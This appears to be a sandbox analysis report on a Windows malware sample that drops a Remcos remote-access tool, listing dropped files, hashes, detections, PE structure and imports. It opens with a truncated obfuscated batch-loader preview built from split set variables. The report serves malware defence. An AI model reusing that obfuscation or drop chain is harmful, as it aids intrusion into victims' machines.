                                                                                      Preview:@echo off..set "Nnqr=set "..%Nnqr%"njyC=="..%Nnqr%"qkMvMLsfma%njyC%http"..%Nnqr%"dbvWEsxWns%njyC%rem "..%Nnqr%"NpzRZtRBVV%njyC%Cloa"..%Nnqr%"ftNVZzSZxa%njyC%/Bat"..%Nnqr%"TwupSEtIWD%njyC%gith"..%Nnqr%"yIGacXULig%njyC%k"..%Nnqr%"uGlGnqCSun%njyC%h2sh"..%Nnqr%"FUsYUbfxRq%njyC%s://"..%Nnqr%"ewghYLVJDJ%njyC%om/c"..%Nnqr%"ZxOeNaoDFO%njyC%ub.c"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%%TwupSEtIWD%%ZxOeNaoDFO%%ewghYLVJDJ%%uGlGnqCSun%%ftNVZzSZxa%%NpzRZtRBVV%%yIGacXULig%..%Nnqr%"dbvWEsxWns%njyC%@ech"..%Nnqr%"qkMvMLsfma%njyC%o of"..%Nnqr%"FUsYUbfxRq%njyC%f"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%..%Nnqr%"NOtbuvMLuE%njyC%alph"..%Nnqr%"jSzGRzcKvC%njyC%ul 2"..%Nnqr%"KhBjpctAkV%njyC%.exe"..%Nnqr%"ftNVZzSZxa%njyC%c32."..%Nnqr%"czhHhGJsdj%njyC%m32\"..%Nnqr%"TOzhrohQZT%njyC% C:\"..%Nnqr%"NpzRZtRBVV%njyC%exe "..%Nnqr%"ppIMorhdlj%njyC% &"..%Nnqr%"SXdBSshqoL%njyC%Publ"..%Nnqr%"apGEijJnKT%njyC%\cmd"..%Nnqr%"qkMvMLsfma%njyC%Wind"..%Nnqr%"QxcSEoHMVZ%njyC%s\\S"..%Nnqr%"AvhQIkjRki%njyC%a.ex"..%Nnqr%"yIGacXULig%njyC%/

                                                                                      C:\Users\Public\Libraries\easinvoker.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\udVh4Ist4Z.exe
                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):131648
                                                                                      Entropy (8bit):5.225468064273746
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
                                                                                      MD5:231CE1E1D7D98B44371FFFF407D68B59
                                                                                      SHA1:25510D0F6353DBF0C9F72FC880DE7585E34B28FF
                                                                                      SHA-256:30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                                                                                      SHA-512:520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                      Joe Sandbox View:
                                                                                      • Filename: Enquiry 230424.bat, Detection: malicious, Browse
                                                                                      • Filename: URGENTE_NOTIFICATION.cmd, Detection: malicious, Browse
                                                                                      • Filename: OKhCyJ619J.rtf, Detection: malicious, Browse
                                                                                      • Filename: fu56fbrtn8.exe, Detection: malicious, Browse
                                                                                      • Filename: FT. 40FE CNY .xlsx.lnk, Detection: malicious, Browse
                                                                                      • Filename: HFiHWvPsvA.rtf, Detection: malicious, Browse
                                                                                      • Filename: payment swift.xls, Detection: malicious, Browse
                                                                                      • Filename: VdwJB2cS5l.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.Win32.RATX-gen.9491.24773.exe, Detection: malicious, Browse
                                                                                      • Filename: Purchase order.exe, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

                                                                                      C:\Users\Public\Libraries\netutils.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\udVh4Ist4Z.exe
                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):116908
                                                                                      Entropy (8bit):5.087211878722834
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:AxdWID3z1y5XtsBms9bOPu5jDqWte6VNCl7MbiRvRRJHu:AxdB/usBLOP8qWte6VQRRJHu
                                                                                      MD5:566B326055C3ED8E2028AA1E2C1054D0
                                                                                      SHA1:C25FA6D6369C083526CAFCF45B5F554635AFE218
                                                                                      SHA-256:A692D4305B95E57E2CFC871D53A41A5BFC9E306CB1A86CA1159DB4F469598714
                                                                                      SHA-512:DA4B0B45D47757B69F9ABC1817D3CB3C85DEB08658E55F07B016FBA053EFE541A5791B9B2B380C25B440BBAE6916C5A2245261553CA3C5025D9D55C943F9823C
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 83%
                                                                                      • Antivirus: Virustotal, Detection: 68%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.^........& ....."...$................<a.............................0................ ..............................................................`..(...............\........................... ...(................................................... ...0!.......".................. .P`. ........@.......(..............@.p.. .......P.......0..............@.P@. ..(....`.......6..............@.0@. .......p.......:..............@.0@. ..................................p.. ...............<..............@.0@. ...............>..............@.0.. ....X............F..............@.@.. ....h............H..............@.`.. ..\............J..............@.0B/4...................L..............@.PB/19..................P..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

                                                                                      C:\Users\Public\Libraries\nmfsxfjX.pif

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\udVh4Ist4Z.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):68096
                                                                                      Entropy (8bit):6.328046551801531
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                      MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                      SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                      SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                      SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

                                                                                      C:\Users\Public\Xjfxsfmn.url

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\udVh4Ist4Z.exe
                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Xjfxsfmn.PIF">), ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):100
                                                                                      Entropy (8bit):5.0888566309110495
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMNdWD1Osb6U+K90y:HRYFVmTWDyzYUD1OE/b0y
                                                                                      MD5:570987CEFD2924D7D4799ED446EA8A55
                                                                                      SHA1:9287AAFF54FAF5B69A9B6E9965B39BAA6B99F063
                                                                                      SHA-256:EEC192DB3F64EF0C6838C862E8618CEC18DC157BBC93C937908AC8FFDD59B464
                                                                                      SHA-512:58D44C1311E9B4DA3947EBF6189E6B380033E7E2A8A112E11BBFA79A57CAB00EF4B7D5A5CED6F30D4495AF2ACCA42B2DD0B8396DE585BBBD1F079998A5390D3E
                                                                                      Malicious:true
                                                                                      Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Xjfxsfmn.PIF"..IconIndex=21..HotKey=63..

                                                                                      C:\Users\user\AppData\Local\VirtualStore\ProgramData\Remcos\Loader.Log

                                                                                      Download File
                                                                                      Process:C:\ProgramData\Remcos\remcos.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):366
                                                                                      Entropy (8bit):4.665424305888495
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:+VaRdNpgRqtDajMyc0opRdNpgRqtDajMyc0opRdNpgRqtDajMyc0ov:NjRDtyc0oVjRDtyc0oVjRDtyc0ov
                                                                                      MD5:FEC9FF49E3AE268178230CDB3FF67676
                                                                                      SHA1:B84497F32A7990AE46C9BC74698468187A076C04
                                                                                      SHA-256:A5EB9AA311F946178BE64D284F4F1FCE6372F95CB19B07E749172C346A7B2C75
                                                                                      SHA-512:8932674400526EACB7B48F507DE7EEB828FF7FE5D931F35515C194505069FE5AB5450FE2E760E4AA7710271B7CD29A18C05725C70E8B6117313EB3BDE0F01667
                                                                                      Malicious:false
                                                                                      Preview:24-04-24.1059: Mercury/32 Loader Started..24-04-24.1059: Loader encountered Windows error 2 creating Mercury/32 process...24-04-24.1059: Mercury/32 Loader Started..24-04-24.1059: Loader encountered Windows error 2 creating Mercury/32 process...24-04-24.1059: Mercury/32 Loader Started..24-04-24.1059: Loader encountered Windows error 2 creating Mercury/32 process...

                                                                                      C:\Users\user\AppData\Roaming\Remcos\Loader.Log

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):366
                                                                                      Entropy (8bit):4.665424305888495
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:+VaRdNpgRqtDajMyc0opRdNpgRqtDajMyc0opRdNpgRqtDajMyc0ov:NjRDtyc0oVjRDtyc0oVjRDtyc0ov
                                                                                      MD5:FEC9FF49E3AE268178230CDB3FF67676
                                                                                      SHA1:B84497F32A7990AE46C9BC74698468187A076C04
                                                                                      SHA-256:A5EB9AA311F946178BE64D284F4F1FCE6372F95CB19B07E749172C346A7B2C75
                                                                                      SHA-512:8932674400526EACB7B48F507DE7EEB828FF7FE5D931F35515C194505069FE5AB5450FE2E760E4AA7710271B7CD29A18C05725C70E8B6117313EB3BDE0F01667
                                                                                      Malicious:false
                                                                                      Preview:24-04-24.1059: Mercury/32 Loader Started..24-04-24.1059: Loader encountered Windows error 2 creating Mercury/32 process...24-04-24.1059: Mercury/32 Loader Started..24-04-24.1059: Loader encountered Windows error 2 creating Mercury/32 process...24-04-24.1059: Mercury/32 Loader Started..24-04-24.1059: Loader encountered Windows error 2 creating Mercury/32 process...

                                                                                      C:\Users\user\AppData\Roaming\Remcos\remcos.exe

                                                                                      Download File
                                                                                      Process:C:\Users\Public\Libraries\nmfsxfjX.pif
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):68096
                                                                                      Entropy (8bit):6.328046551801531
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                      MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                      SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                      SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                      SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.422853453364174
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                                      • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      File name:udVh4Ist4Z.exe
                                                                                      File size:1'639'424 bytes
                                                                                      MD5:2cc30d206669699e58870623365fef82
                                                                                      SHA1:de5e70f094d0b72660aa57b87667edd9d52971fc
                                                                                      SHA256:42ac8e7e9df9877af1382f5626fd74e63210d307f6d577cd5b387ffd0c9520bd
                                                                                      SHA512:2f1f275b9a928844d8f97dc07aa4d0f53da61fd06a507424a873ba128e71d2754e710dbebe1935adc3dada94b42417b1fc30a1915a40b2cffc655c55d7c62005
                                                                                      SSDEEP:24576:7MkT4gLKu9KKozJQd/HJNRO/BhM6wIJp4m+3bu8U2flxAv:QkTpT9K1mzyhM6wW4mEQ2W
                                                                                      TLSH:E775BE51B790D1B3E03B10FED73AB5D862CDBAA4295374CCB2D50A7BDE37982244528E
                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                      File Icon

                                                                                      Icon Hash:3575b4a8b0b085d1

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x4575c0
                                                                                      Entrypoint Section:CODE
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                      DLL Characteristics:
                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:55bb4abe492867a8202968458cfd638d

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      add esp, FFFFFFF0h
                                                                                      mov eax, 00457400h
                                                                                      call 00007F8F54B91525h
                                                                                      mov eax, dword ptr [0056C65Ch]
                                                                                      mov eax, dword ptr [eax]
                                                                                      call 00007F8F54BD9899h
                                                                                      mov ecx, dword ptr [0056C740h]
                                                                                      mov eax, dword ptr [0056C65Ch]
                                                                                      mov eax, dword ptr [eax]
                                                                                      mov edx, dword ptr [00456D98h]
                                                                                      call 00007F8F54BD9899h
                                                                                      mov eax, dword ptr [0056C65Ch]
                                                                                      mov eax, dword ptr [eax]
                                                                                      call 00007F8F54BD990Dh
                                                                                      call 00007F8F54B8F4E0h
                                                                                      lea eax, dword ptr [eax+00h]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x1710000x78.edata
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x16e0000x2066.idata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x17b0000x1c600.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1740000x6328.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x1730000x18.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      CODE0x10000x566080x56800e749dfadfcac9668fb6395a24d87ee54False0.5225823022037572data6.515156263316965IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      DATA0x580000x1147cc0x114800f3b3abebaed6fcdff591bc5a977c1e25False0.7515937570637432data7.548892177394611IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      BSS0x16d0000xd5d0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .idata0x16e0000x20660x22003aa6d5d6785cddb9a5bee660a602eb8eFalse0.35340073529411764data4.887767818013599IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .edata0x1710000x780x20086a99c9586c90c6cc57ed7fd9ed47346False0.2109375data1.5388005609521742IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                      .tls0x1720000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rdata0x1730000x180x2009d1bba21368430faa0bf768fbfaa7fe5False0.05078125MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "W"0.2069200177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x1740000x63280x64003a96abebf4210d131401c2199c50cc0aFalse0.6482421875data6.687430221930037IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x17b0000x1c6000x1c60076ae21a9e1fd9d25b479364b03fa95c9False0.13988504955947137data4.178255960193848IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_CURSOR0x17b8000x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                      RT_CURSOR0x17b9340x134data0.4642857142857143
                                                                                      RT_CURSOR0x17ba680x134data0.4805194805194805
                                                                                      RT_CURSOR0x17bb9c0x134data0.38311688311688313
                                                                                      RT_CURSOR0x17bcd00x134data0.36038961038961037
                                                                                      RT_CURSOR0x17be040x134data0.4090909090909091
                                                                                      RT_CURSOR0x17bf380x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                      RT_ICON0x17c06c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.28635084427767354
                                                                                      RT_ICON0x17d1140x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m0.18278008298755186
                                                                                      RT_ICON0x17f6bc0x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/m0.11275415896487985
                                                                                      RT_ICON0x184b440x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 25600, resolution 3779 x 3779 px/m0.10086466165413534
                                                                                      RT_ICON0x18b32c0x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3779 x 3779 px/m0.08608366617616145
                                                                                      RT_STRING0x1947d40x1d4AmigaOS bitmap font "n", fc_YSize 27392, 18688 elements, 2nd "S", 3rd0.43162393162393164
                                                                                      RT_STRING0x1949a80x1c8data0.4298245614035088
                                                                                      RT_STRING0x194b700xe8data0.603448275862069
                                                                                      RT_STRING0x194c580x2f8data0.45
                                                                                      RT_STRING0x194f500xd8data0.5879629629629629
                                                                                      RT_STRING0x1950280x22cdata0.48201438848920863
                                                                                      RT_STRING0x1952540x3f4data0.3715415019762846
                                                                                      RT_STRING0x1956480x370data0.39431818181818185
                                                                                      RT_STRING0x1959b80x3e8data0.33
                                                                                      RT_STRING0x195da00x234data0.475177304964539
                                                                                      RT_STRING0x195fd40xecdata0.5508474576271186
                                                                                      RT_STRING0x1960c00x1b4data0.5206422018348624
                                                                                      RT_STRING0x1962740x3e4data0.32028112449799195
                                                                                      RT_STRING0x1966580x358data0.4158878504672897
                                                                                      RT_STRING0x1969b00x2b4data0.4060693641618497
                                                                                      RT_RCDATA0x196c640x10data1.5
                                                                                      RT_RCDATA0x196c740x22cdata0.7751798561151079
                                                                                      RT_RCDATA0x196ea00x652Delphi compiled form 'TForm1'0.43325092707045737
                                                                                      RT_GROUP_CURSOR0x1974f40x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                      RT_GROUP_CURSOR0x1975080x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                      RT_GROUP_CURSOR0x19751c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                      RT_GROUP_CURSOR0x1975300x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                      RT_GROUP_CURSOR0x1975440x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                      RT_GROUP_CURSOR0x1975580x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                      RT_GROUP_CURSOR0x19756c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                      RT_GROUP_ICON0x1975800x4cdata0.8421052631578947

                                                                                      Imports

                                                                                      DLLImport
                                                                                      kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                      user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                      oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                      kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                      kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                      version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                      gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
